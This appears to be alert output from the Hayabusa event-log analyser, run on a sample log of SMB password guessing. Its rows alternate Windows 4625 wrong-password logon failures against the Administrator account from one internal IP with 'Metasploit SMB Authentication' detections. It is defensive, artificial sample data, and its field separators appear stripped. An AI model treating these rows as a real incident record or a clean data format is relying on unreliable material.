19262016-09-20 01:50:24.842 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19272016-09-20 01:50:24.842 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19282016-09-20 01:50:24.886 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19292016-09-20 01:50:24.886 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19302016-09-20 01:50:24.935 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19312016-09-20 01:50:24.935 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19322016-09-20 01:50:24.990 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19332016-09-20 01:50:24.990 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19342016-09-20 01:50:25.040 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7nSzwstH2imPjwah : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19352016-09-20 01:50:25.040 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19362016-09-20 01:50:25.153 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9Z6NM0I4vRTXlLKu : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19372016-09-20 01:50:25.153 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19382016-09-20 01:50:25.193 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: jYhjN3f8KlFIEUKy : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19392016-09-20 01:50:25.193 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19402016-09-20 01:50:25.232 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qWicYt2HXLDgc3kc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19412016-09-20 01:50:25.232 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19422016-09-20 01:50:25.269 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Uz7yqqxdMrsM2L1g : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19432016-09-20 01:50:25.269 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19442016-09-20 01:50:25.308 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: wqKTguT2Z3OPCxGR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19452016-09-20 01:50:25.308 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19462016-09-20 01:50:25.352 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ywpwCM4u6nFSq9oS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19472016-09-20 01:50:25.352 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19482016-09-20 01:50:25.407 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: k1t5ZBw3HOxux65e : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19492016-09-20 01:50:25.407 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19502016-09-20 01:50:25.534 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MtLFQSltjjOjdl2c : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19512016-09-20 01:50:25.534 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19522016-09-20 01:50:25.593 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AyFD3cjef0NUMZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19532016-09-20 01:50:25.593 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19542016-09-20 01:50:25.656 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: uDYECnF1YTKRKA3K : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19552016-09-20 01:50:25.656 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19562016-09-20 01:50:25.700 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pfqxcIVpX9BbsPIM : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19572016-09-20 01:50:25.700 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19582016-09-20 01:50:25.745 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: mjL5hvyYesMfDISw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19592016-09-20 01:50:25.745 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19602016-09-20 01:50:25.774 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 3bh8c5ohv55SAX26 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19612016-09-20 01:50:25.774 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19622016-09-20 01:50:25.817 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: MflfcFDnGU3xUOmz : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19632016-09-20 01:50:25.817 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19642016-09-20 01:50:25.859 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aX0wfTs5FzCdwGrR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19652016-09-20 01:50:25.859 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19662016-09-20 01:50:25.895 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9gdU6faDjEH5wW2X : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19672016-09-20 01:50:25.895 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19682016-09-20 01:50:25.929 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 507PC8xD6l0TbhG3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19692016-09-20 01:50:25.929 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19702016-09-20 01:50:25.973 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: VrWgYcf9EuXt4MHS : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19712016-09-20 01:50:25.973 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19722016-09-20 01:50:26.088 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: GvIGEw3fdX9cDzIV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19732016-09-20 01:50:26.088 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19742016-09-20 01:50:26.159 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9X1q0dT5irWa44Rz : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19752016-09-20 01:50:26.159 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19762016-09-20 01:50:26.307 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ZpgAkElSQjVo53z2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19772016-09-20 01:50:26.307 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19782016-09-20 01:50:26.410 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7nxUEwRMaiAhiIXv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19792016-09-20 01:50:26.410 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19802016-09-20 01:50:26.453 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: vIoaysmFNfEerv8f : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19812016-09-20 01:50:26.453 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19822016-09-20 01:50:26.528 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: aHLhFgL0xfnrAIoF : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19832016-09-20 01:50:26.528 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19842016-09-20 01:50:26.619 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: YGK96B1hDPMK9YKh : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19852016-09-20 01:50:26.619 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19862016-09-20 01:50:26.704 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: yhDnNRDnAwctVtgQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19872016-09-20 01:50:26.704 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19882016-09-20 01:50:26.793 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 8zzO7RKaBPpg549A : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19892016-09-20 01:50:26.793 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19902016-09-20 01:50:26.859 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: zDgDGO3IKiLoIQ5D : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19912016-09-20 01:50:26.859 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19922016-09-20 01:50:27.024 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 0aaYeBTUEudC3446 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19932016-09-20 01:50:27.024 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19942016-09-20 01:50:27.093 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: I41H8U06uuGlMf9S : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19952016-09-20 01:50:27.093 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19962016-09-20 01:50:27.170 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: r6Eh55149gbuU2el : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19972016-09-20 01:50:27.170 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19982016-09-20 01:50:27.248 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: ajzJabQi7CjosFQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
19992016-09-20 01:50:27.248 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20002016-09-20 01:50:27.290 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: l9y7gyU9aJi6Fpm3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20012016-09-20 01:50:27.290 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20022016-09-20 01:50:27.361 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: hbLiIVcBYlu5JkX2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20032016-09-20 01:50:27.361 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20042016-09-20 01:50:27.424 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: bDfEfHk54J3lJI6m : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20052016-09-20 01:50:27.424 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20062016-09-20 01:50:27.496 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: WOpuMTECalyeObl7 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20072016-09-20 01:50:27.496 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20082016-09-20 01:50:27.537 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: nZQYU1dyQOqlNJDL : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20092016-09-20 01:50:27.537 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20102016-09-20 01:50:27.577 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: pc58gDT07WNH3mMz : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20112016-09-20 01:50:27.577 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20122016-09-20 01:50:27.624 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: EhExnDfInKbEI6AO : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20132016-09-20 01:50:27.624 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20142016-09-20 01:50:27.710 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qKKTTQ0ZT2Ye4TV9 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20152016-09-20 01:50:27.710 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20162016-09-20 01:50:27.772 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: LdBFYyftnH67Gyh5 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20172016-09-20 01:50:27.772 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20182016-09-20 01:50:27.812 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: eO6c2PDl7zVBGzPi : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20192016-09-20 01:50:27.812 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20202016-09-20 01:50:27.848 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 1ONnDOs16EnBkdFv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
20212016-09-20 01:50:27.848 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
